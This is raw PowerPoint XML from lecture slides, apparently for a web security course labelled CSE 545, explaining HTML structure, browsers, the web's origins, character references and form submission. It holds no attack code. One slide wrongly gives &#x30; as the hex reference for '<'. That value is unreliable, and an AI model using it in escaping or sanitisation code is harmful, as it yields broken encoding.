                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;meta charset="UTF-8"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;title&gt;CSE 545&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/"&gt;Text&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9492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Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User agent is responsible for parsing and interpreting the HTML and displaying it to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15328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Parsed HTML 5 Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2015-01-14 at 4.25.44 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-22843" r="-22843"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="931380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Birth of the Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Created by Tim Berners-Lee while he was working at CERN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>First CERN proposal in 1989</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Finished first website end of 1990</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" noProof="0"/>
              <a:t>Weaving the Web: The Original Design and Ultimate Destiny of the World Wide Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>, Tim Berners-Lee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343370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Parsed HTML 5 Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screen Shot 2015-01-15 at 11.13.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1778000"/>
            <a:ext cx="6070600" cy="3289300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2890685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Character References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to include HTML special characters as text/data?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt; &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> " &amp; = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encode the character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Also referred to in HTML &lt; 5.0 as “entity reference” or “entity encoding”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Three types, each starts with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> and ends with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Named character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>predefined_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Decimal numeric character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>decimal_unicode_code_point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hexadecimal numeric character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#x&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hexadecimal_unicode_code_point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Note: This will be the root of a significant number of vulnerabilities and is critical to understand</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33877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a:t>The ampersand (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is used to start a character reference, so it must be encoded as a character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#38;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#x26;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#x00026;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7961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err="1"/>
              <a:t>é</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eacute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#233;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#xe9;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422775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HTML – Character References Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why must &lt; be encoded as a character reference?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#60;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#x30;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;#x00030;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225394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Forms </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a component of a Web page that has form controls, such as text fields, buttons, checkboxes, range controls, or color pickers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form is a way to create a complicated HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute contains the URI to submit the HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default is the current URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute is the HTTP method to use in the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET or POST, default is GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32734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HTML – Forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Children </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tags of the form are transformed into either query URL parameters or HTTP request body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difference is based on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET passes data in the query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST passes data in the body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is encoded as either “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” or “multipart/form-data”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET always uses “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, default is “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"multipart/form-data" is mainly used to upload files, so we will focus on “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19808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HTML – Forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data sent as name-value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data from the input tags (as well as others)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="foo" value="bar"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name is taken from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Value is taken either from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>value</a:t>
